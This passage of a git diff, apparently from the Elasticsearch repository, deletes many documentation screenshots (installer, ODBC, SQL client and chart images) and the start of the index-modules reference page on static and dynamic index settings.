590c52371a7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_installing.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_locations.png b/docs/reference/images/msi_installer/msi_installer_locations.png deleted file mode 100644 index ba7151e3714..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_locations.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_no_service.png b/docs/reference/images/msi_installer/msi_installer_no_service.png deleted file mode 100644 index fbe9a0510c7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_no_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_plugins.png b/docs/reference/images/msi_installer/msi_installer_plugins.png deleted file mode 100644 index e58f426a47d..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_selected_plugins.png b/docs/reference/images/msi_installer/msi_installer_selected_plugins.png deleted file mode 100644 index e58f426a47d..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_selected_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_service.png b/docs/reference/images/msi_installer/msi_installer_service.png deleted file mode 100644 index c7fae13637b..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_success.png b/docs/reference/images/msi_installer/msi_installer_success.png deleted file mode 100644 index 3a58467ae18..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_success.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_uninstall.png b/docs/reference/images/msi_installer/msi_installer_uninstall.png deleted file mode 100644 index 6b5b69a5768..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_uninstall.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png b/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png deleted file mode 100644 index 7ca413bb299..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png b/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png deleted file mode 100644 index e5ee18b5208..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png b/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png deleted file mode 100644 index 3e7496505f7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_xpack.png b/docs/reference/images/msi_installer/msi_installer_xpack.png deleted file mode 100644 index e457a578877..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_xpack.png and /dev/null differ diff --git a/docs/reference/images/percentiles_error.png b/docs/reference/images/percentiles_error.png deleted file mode 100644 index b57464e72e0..00000000000 Binary files a/docs/reference/images/percentiles_error.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_0.2beta.png b/docs/reference/images/pipeline_movavg/double_0.2beta.png deleted file mode 100644 index 64499b98342..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_0.2beta.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_0.7beta.png b/docs/reference/images/pipeline_movavg/double_0.7beta.png deleted file mode 100644 index b9f530227d9..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_0.7beta.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_prediction_global.png b/docs/reference/images/pipeline_movavg/double_prediction_global.png deleted file mode 100644 index faee6d22bc2..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_prediction_global.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_prediction_local.png b/docs/reference/images/pipeline_movavg/double_prediction_local.png deleted file mode 100644 index 930a5cfde9b..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_prediction_local.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/linear_100window.png b/docs/reference/images/pipeline_movavg/linear_100window.png deleted file mode 100644 index 3a4d51ae956..00000000000 Binary files a/docs/reference/images/pipeline_movavg/linear_100window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/linear_10window.png b/docs/reference/images/pipeline_movavg/linear_10window.png deleted file mode 100644 index 1407ded8791..00000000000 Binary files a/docs/reference/images/pipeline_movavg/linear_10window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/movavg_100window.png b/docs/reference/images/pipeline_movavg/movavg_100window.png deleted file mode 100644 index 45094ec2681..00000000000 Binary files a/docs/reference/images/pipeline_movavg/movavg_100window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/movavg_10window.png b/docs/reference/images/pipeline_movavg/movavg_10window.png deleted file mode 100644 index 1e9f543385f..00000000000 Binary files a/docs/reference/images/pipeline_movavg/movavg_10window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/simple_prediction.png b/docs/reference/images/pipeline_movavg/simple_prediction.png deleted file mode 100644 index d74724e1546..00000000000 Binary files a/docs/reference/images/pipeline_movavg/simple_prediction.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/single_0.2alpha.png b/docs/reference/images/pipeline_movavg/single_0.2alpha.png deleted file mode 100644 index d96cf771743..00000000000 Binary files a/docs/reference/images/pipeline_movavg/single_0.2alpha.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/single_0.7alpha.png b/docs/reference/images/pipeline_movavg/single_0.7alpha.png deleted file mode 100644 index bf7bdd1752e..00000000000 Binary files a/docs/reference/images/pipeline_movavg/single_0.7alpha.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple.png b/docs/reference/images/pipeline_movavg/triple.png deleted file mode 100644 index 8aaf281c1bf..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple_prediction.png b/docs/reference/images/pipeline_movavg/triple_prediction.png deleted file mode 100644 index fb34881d1e3..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple_prediction.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple_untruncated.png b/docs/reference/images/pipeline_movavg/triple_untruncated.png deleted file mode 100644 index 4f7528ea5fe..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple_untruncated.png and /dev/null differ diff --git a/docs/reference/images/pipeline_serialdiff/dow.png b/docs/reference/images/pipeline_serialdiff/dow.png deleted file mode 100644 index d46f507ded1..00000000000 Binary files a/docs/reference/images/pipeline_serialdiff/dow.png and /dev/null differ diff --git a/docs/reference/images/pipeline_serialdiff/lemmings.png b/docs/reference/images/pipeline_serialdiff/lemmings.png deleted file mode 100644 index 25f3bb7d1a1..00000000000 Binary files a/docs/reference/images/pipeline_serialdiff/lemmings.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_0001.png b/docs/reference/images/rare_terms/accuracy_0001.png deleted file mode 100644 index 0c13a3938cd..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_0001.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_001.png b/docs/reference/images/rare_terms/accuracy_001.png deleted file mode 100644 index 2aa1be316c3..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_001.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_01.png b/docs/reference/images/rare_terms/accuracy_01.png deleted file mode 100644 index 7182b7d3c53..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_01.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/memory.png b/docs/reference/images/rare_terms/memory.png deleted file mode 100644 index e0de5c21639..00000000000 Binary files a/docs/reference/images/rare_terms/memory.png and /dev/null differ diff --git a/docs/reference/images/s_calc.png b/docs/reference/images/s_calc.png deleted file mode 100644 index 3fb95e58df5..00000000000 Binary files a/docs/reference/images/s_calc.png and /dev/null differ diff --git a/docs/reference/images/service-manager-win.png b/docs/reference/images/service-manager-win.png deleted file mode 100644 index ca58b67d6a2..00000000000 Binary files a/docs/reference/images/service-manager-win.png and /dev/null differ diff --git a/docs/reference/images/sigma.png b/docs/reference/images/sigma.png deleted file mode 100644 index a9f72995e56..00000000000 Binary files a/docs/reference/images/sigma.png and /dev/null differ diff --git a/docs/reference/images/sigma_calc.png b/docs/reference/images/sigma_calc.png deleted file mode 100644 index 9001bbe9eaf..00000000000 Binary files a/docs/reference/images/sigma_calc.png and /dev/null differ diff --git a/docs/reference/images/spatial/error_distance.png b/docs/reference/images/spatial/error_distance.png deleted file mode 100644 index a3274d778c0..00000000000 Binary files a/docs/reference/images/spatial/error_distance.png and /dev/null differ diff --git a/docs/reference/images/spatial/geoshape_grid.png b/docs/reference/images/spatial/geoshape_grid.png deleted file mode 100644 index 6e3fe8e8162..00000000000 Binary files a/docs/reference/images/spatial/geoshape_grid.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png b/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png deleted file mode 100644 index bf7f1c63135..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png b/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png deleted file mode 100644 index f63df0987c1..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png b/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png deleted file mode 100644 index 825ce1b6357..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png b/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png deleted file mode 100644 index bcad2a75d80..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png b/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png deleted file mode 100644 index c76ae19937a..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-6-data.png b/docs/reference/images/sql/client-apps/dbeaver-6-data.png deleted file mode 100644 index 053042b7911..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-6-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png b/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png deleted file mode 100644 index d9290e63dea..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-2-driver.png b/docs/reference/images/sql/client-apps/dbvis-2-driver.png deleted file mode 100644 index a5cbddfefbd..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-2-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png b/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png deleted file mode 100644 index bab82fae3f2..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png b/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png deleted file mode 100644 index 3001641b531..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png b/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png deleted file mode 100644 index e59e8215ec6..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-6-data.png b/docs/reference/images/sql/client-apps/dbvis-6-data.png deleted file mode 100644 index 65f8a04eb5d..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-6-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png b/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png deleted file mode 100644 index b5ca1c95126..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-2-select-driver.png b/docs/reference/images/sql/client-apps/squirell-2-select-driver.png deleted file mode 100644 index 7b55d938ce0..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-2-select-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-3-add-driver.png b/docs/reference/images/sql/client-apps/squirell-3-add-driver.png deleted file mode 100644 index 9b476f2bc19..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-3-add-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-4-driver-list.png b/docs/reference/images/sql/client-apps/squirell-4-driver-list.png deleted file mode 100644 index 990669f8bbf..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-4-driver-list.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-5-add-alias.png b/docs/reference/images/sql/client-apps/squirell-5-add-alias.png deleted file mode 100644 index a23e348f45c..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-5-add-alias.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-6-alias-props.png b/docs/reference/images/sql/client-apps/squirell-6-alias-props.png deleted file mode 100644 index a43e5b5be69..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-6-alias-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-7-data.png b/docs/reference/images/sql/client-apps/squirell-7-data.png deleted file mode 100644 index ccfcd2593bb..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-7-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png b/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png deleted file mode 100644 index e305fd2a9dd..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-2-select-driver.png b/docs/reference/images/sql/client-apps/workbench-2-select-driver.png deleted file mode 100644 index 94d26b2d2d3..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-2-select-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-3-add-jar.png b/docs/reference/images/sql/client-apps/workbench-3-add-jar.png deleted file mode 100644 index b10aa9ad9f1..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-3-add-jar.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-4-connection.png b/docs/reference/images/sql/client-apps/workbench-4-connection.png deleted file mode 100644 index 9262ef0f533..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-4-connection.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-5-data.png b/docs/reference/images/sql/client-apps/workbench-5-data.png deleted file mode 100644 index 7b8251fc958..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-5-data.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_drivers.png b/docs/reference/images/sql/odbc/administrator_drivers.png deleted file mode 100644 index 9f4a26b178f..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_launch_editor.png b/docs/reference/images/sql/odbc/administrator_launch_editor.png deleted file mode 100644 index 3bb93af29f9..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_launch_editor.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_system_add.png b/docs/reference/images/sql/odbc/administrator_system_add.png deleted file mode 100644 index 64d47b67f81..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_system_add.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_system_added.png b/docs/reference/images/sql/odbc/administrator_system_added.png deleted file mode 100644 index 6797264a89e..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_system_added.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_tracing.png b/docs/reference/images/sql/odbc/administrator_tracing.png deleted file mode 100644 index 14493ba8d5a..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_tracing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_cred.png b/docs/reference/images/sql/odbc/apps_excel_cred.png deleted file mode 100644 index a3da36dbf6e..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_cred.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_dsn.png b/docs/reference/images/sql/odbc/apps_excel_dsn.png deleted file mode 100644 index 7e81cc01f12..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_fromodbc.png b/docs/reference/images/sql/odbc/apps_excel_fromodbc.png deleted file mode 100644 index 603af4dfc72..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_fromodbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_loaded.png b/docs/reference/images/sql/odbc/apps_excel_loaded.png deleted file mode 100644 index 7d7ea86c8cc..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_picktable.png b/docs/reference/images/sql/odbc/apps_excel_picktable.png deleted file mode 100644 index fd7aecc4128..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_picktable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_databases.png b/docs/reference/images/sql/odbc/apps_microstrat_databases.png deleted file mode 100644 index 9f1c69b7968..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_databases.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_dsn.png b/docs/reference/images/sql/odbc/apps_microstrat_dsn.png deleted file mode 100644 index 4fa4c90947f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_inmem.png b/docs/reference/images/sql/odbc/apps_microstrat_inmem.png deleted file mode 100644 index 3e97c031115..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_inmem.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_live.png b/docs/reference/images/sql/odbc/apps_microstrat_live.png deleted file mode 100644 index 2a3e0fa02a3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_live.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png b/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png deleted file mode 100644 index a1502c4e9f3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newdata.png b/docs/reference/images/sql/odbc/apps_microstrat_newdata.png deleted file mode 100644 index 3a00c6dffe2..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newdata.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png b/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png deleted file mode 100644 index 275588a7fe0..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newds.png b/docs/reference/images/sql/odbc/apps_microstrat_newds.png deleted file mode 100644 index 45e3666eae6..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newds.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_tables.png b/docs/reference/images/sql/odbc/apps_microstrat_tables.png deleted file mode 100644 index 71283d05e5c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_tables.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_visualize.png b/docs/reference/images/sql/odbc/apps_microstrat_visualize.png deleted file mode 100644 index 3e15946f0f1..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_visualize.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_dsn.png b/docs/reference/images/sql/odbc/apps_pbi_dsn.png deleted file mode 100644 index 9e9512ec40f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png b/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png deleted file mode 100644 index 313b1edbc74..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png b/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png deleted file mode 100644 index fade98f4ad5..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_loaded.png b/docs/reference/images/sql/odbc/apps_pbi_loaded.png deleted file mode 100644 index c1927d2200c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_picktable.png b/docs/reference/images/sql/odbc/apps_pbi_picktable.png deleted file mode 100644 index 2b2e1c8e4e5..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_picktable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_ps_exed.png b/docs/reference/images/sql/odbc/apps_ps_exed.png deleted file mode 100644 index 84c3c12ec48..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_ps_exed.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_adddata.png b/docs/reference/images/sql/odbc/apps_qlik_adddata.png deleted file mode 100644 index b32596c1c01..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_adddata.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_create.png b/docs/reference/images/sql/odbc/apps_qlik_create.png deleted file mode 100644 index 4a2438c1cfa..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_create.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_dsn.png b/docs/reference/images/sql/odbc/apps_qlik_dsn.png deleted file mode 100644 index 79852e50168..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_newapp.png b/docs/reference/images/sql/odbc/apps_qlik_newapp.png deleted file mode 100644 index 1909707825a..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_newapp.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_odbc.png b/docs/reference/images/sql/odbc/apps_qlik_odbc.png deleted file mode 100644 index 9b56fe6bcbe..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_odbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_open.png b/docs/reference/images/sql/odbc/apps_qlik_open.png deleted file mode 100644 index f4e33230ecc..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_open.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_selecttable.png b/docs/reference/images/sql/odbc/apps_qlik_selecttable.png deleted file mode 100644 index c6a485cb85c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_selecttable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_visualize.png b/docs/reference/images/sql/odbc/apps_qlik_visualize.png deleted file mode 100644 index c87cd505de3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_visualize.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_connd.png b/docs/reference/images/sql/odbc/apps_tableau_connd.png deleted file mode 100644 index ae34f673aa3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_connd.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png b/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png deleted file mode 100644 index 717c5e4a886..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_loaded.png b/docs/reference/images/sql/odbc/apps_tableau_loaded.png deleted file mode 100644 index 61e80be627f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_basic.png b/docs/reference/images/sql/odbc/dsn_editor_basic.png deleted file mode 100644 index 78c042fd751..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_basic.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_conntest.png b/docs/reference/images/sql/odbc/dsn_editor_conntest.png deleted file mode 100644 index 9b1bdb7bc25..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_conntest.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_logging.png b/docs/reference/images/sql/odbc/dsn_editor_logging.png deleted file mode 100644 index 42a7d59342b..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_logging.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_misc.png b/docs/reference/images/sql/odbc/dsn_editor_misc.png deleted file mode 100644 index 6638aaa3add..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_misc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_security.png b/docs/reference/images/sql/odbc/dsn_editor_security.png deleted file mode 100644 index 33bac80aff7..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_security.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_security_cert.png b/docs/reference/images/sql/odbc/dsn_editor_security_cert.png deleted file mode 100644 index c37c03c6cbc..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_security_cert.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/env_var_log.png b/docs/reference/images/sql/odbc/env_var_log.png deleted file mode 100644 index 739f9650d95..00000000000 Binary files a/docs/reference/images/sql/odbc/env_var_log.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_accept_license.png b/docs/reference/images/sql/odbc/installer_accept_license.png deleted file mode 100644 index 4fc51d1373c..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_accept_license.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_choose_destination.png b/docs/reference/images/sql/odbc/installer_choose_destination.png deleted file mode 100644 index 12419b180d9..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_choose_destination.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_finish.png b/docs/reference/images/sql/odbc/installer_finish.png deleted file mode 100644 index a7ec3606dc2..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_finish.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_installing.png b/docs/reference/images/sql/odbc/installer_installing.png deleted file mode 100644 index 21bec24b1bc..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_installing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_preparing.png b/docs/reference/images/sql/odbc/installer_preparing.png deleted file mode 100644 index 4bb21854874..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_preparing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_ready_install.png b/docs/reference/images/sql/odbc/installer_ready_install.png deleted file mode 100644 index 9ad0e52abb4..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_ready_install.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_started.png b/docs/reference/images/sql/odbc/installer_started.png deleted file mode 100644 index e713594e3cc..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_started.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/launch_administrator.png b/docs/reference/images/sql/odbc/launch_administrator.png deleted file mode 100644 index f7cc37120d7..00000000000 Binary files a/docs/reference/images/sql/odbc/launch_administrator.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/msi_icon.png b/docs/reference/images/sql/odbc/msi_icon.png deleted file mode 100644 index a45bfa28d0e..00000000000 Binary files a/docs/reference/images/sql/odbc/msi_icon.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/uninstall.png b/docs/reference/images/sql/odbc/uninstall.png deleted file mode 100644 index 5bd2ccb7fde..00000000000 Binary files a/docs/reference/images/sql/odbc/uninstall.png and /dev/null differ diff --git a/docs/reference/images/sql/rest/console-triple-quotes.png b/docs/reference/images/sql/rest/console-triple-quotes.png deleted file mode 100644 index 4a13acb9861..00000000000 Binary files a/docs/reference/images/sql/rest/console-triple-quotes.png and /dev/null differ diff --git a/docs/reference/index-modules.asciidoc b/docs/reference/index-modules.asciidoc deleted file mode 100644 index 6af6118663b..00000000000 --- a/docs/reference/index-modules.asciidoc +++ /dev/null @@ -1,357 +0,0 @@ - -[[index-modules]] -= Index modules - -[partintro] --- - -Index Modules are modules created per index and control all aspects related to -an index. - -[discrete] -[[index-modules-settings]] -== Index Settings - -[[index-modules-settings-description]] -// tag::index-modules-settings-description-tag[] -Index level settings can be set per-index. Settings may be: - -_static_:: - -They can only be set at index creation time or on a -<>. - -_dynamic_:: - -They can be changed on a live index using the -<> API. -// end::index-modules-settings-description-tag[] - -WARNING: Changing static or dynamic index settings on a closed index could -result in incorrect settings that are impossible to rectify without deleting -and recreating the index. - -[discrete] -=== Static index settings - -Below is a list of all _static_ index settings that are not associated with any -specific index module: - -[[index-number-of-shards]] -// tag::index-number-of-shards-tag[] -`index.number_of_shards` 